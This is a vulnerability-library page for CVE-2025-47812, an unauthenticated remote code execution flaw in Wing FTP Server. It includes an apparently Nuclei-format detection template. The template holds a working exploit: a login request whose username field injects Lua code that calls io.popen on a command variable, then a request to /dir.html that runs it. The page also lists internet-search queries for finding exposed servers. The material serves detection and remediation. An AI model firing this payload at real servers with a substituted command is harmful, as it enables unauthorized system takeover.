/Vulnerability Library

Wing FTP Server <= 7.4.3 - Remote Code Execution

CVE-2025-47812
Verified

Description

Wing FTP Server versions prior to 7.4.4 are vulnerable to an unauthenticated remote code execution (RCE) flaw (CVE-2025-47812). The vulnerability arises from improper NULL byte handling in the 'username' parameter during login, which allows Lua code injection into session files. These injected session files are executed when accessing authenticated endpoints such as /dir.html, resulting in arbitrary command execution with elevated privileges. This attack is possible only when anonymous login is enabled on the server.

Severity

Critical

CVSS Score

9.8

Exploit Probability

93%

Affected Product

wftpserver

Published Date

July 1, 2025

Template Author

rcesecurity, 4m3rr0r

CVE-2025-47812.yaml
id: CVE-2025-47812

info:
  name: Wing FTP Server <= 7.4.3 - Remote Code Execution
  author: rcesecurity,4m3rr0r
  severity: critical
  description: |
    Wing FTP Server versions prior to 7.4.4 are vulnerable to an unauthenticated remote code execution (RCE) flaw (CVE-2025-47812).
    The vulnerability arises from improper NULL byte handling in the 'username' parameter during login, which allows Lua code injection
    into session files. These injected session files are executed when accessing authenticated endpoints such as /dir.html, resulting
    in arbitrary command execution with elevated privileges. This attack is possible only when anonymous login is enabled on the server.
  impact: |
    Unauthenticated attackers can inject and execute Lua code through NULL byte handling in the username parameter when anonymous login is enabled, achieving remote code execution with elevated privileges.
  remediation: |
    Upgrade Wing FTP Server to version 7.4.4 or later that properly handles NULL bytes in authentication parameters.
  reference:
    - https://www.rcesecurity.com/2025/06/what-the-null-wing-ftp-server-rce-cve-2025-47812/
    - https://github.com/4m3rr0r/CVE-2025-47812-poc
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2025-47812
    epss-score: 0.92615
    epss-percentile: 0.99731
  metadata:
    verified: true
    product: wftpserver
    vendor: wing_ftp_server
    shodan-query:
      - http.html_hash:2121146066
      - http.favicon.hash:963565804
      - title:"Wing FTP Server"
      - "Server: Wing FTP Server"
    fofa-query:
      - icon_hash="963565804"
      - title="Wing FTP Server"
      - "Server: Wing FTP Server"
    zoomeye-query:
      - app="Wing FTP Server"
  tags: cve,cve2025,rce,wingftp,ftp,unauth,kev,vkev,vuln

variables:
  cmd: "echo CVE-2025-47812"

http:
  - raw:
      - |
        POST /loginok.html HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        username=anonymous%00]]%0dlocal+h+%3d+io.popen("{{cmd}}")%0dlocal+r+%3d+h%3aread("*a")%0dh%3aclose()%0dprint(r)%0d--&password=

  - raw:
      - |
        GET /dir.html HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(to_lower(body), "cve-2025-47812")'
        condition: and
# digest: 4a0a0047304502201879586dee99000e55c85936a45b4eb1cd62d7f6761cba207cebc51197db69cb02210082732c3d027cff3ab088f43c32b4dbcd55c25e2d05ff74b79b2b16981aeaf5e8:922c64590222798bb761d5b6d8e72950
9.8Score

CVSS Metrics

CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CVE ID:
cve-2025-47812

References

https://www.rcesecurity.com/2025/06/what-the-null-wing-ftp-server-rce-cve-2025-47812/https://github.com/4m3rr0r/CVE-2025-47812-poc

Remediation Steps

Upgrade Wing FTP Server to version 7.4.4 or later that properly handles NULL bytes in authentication parameters.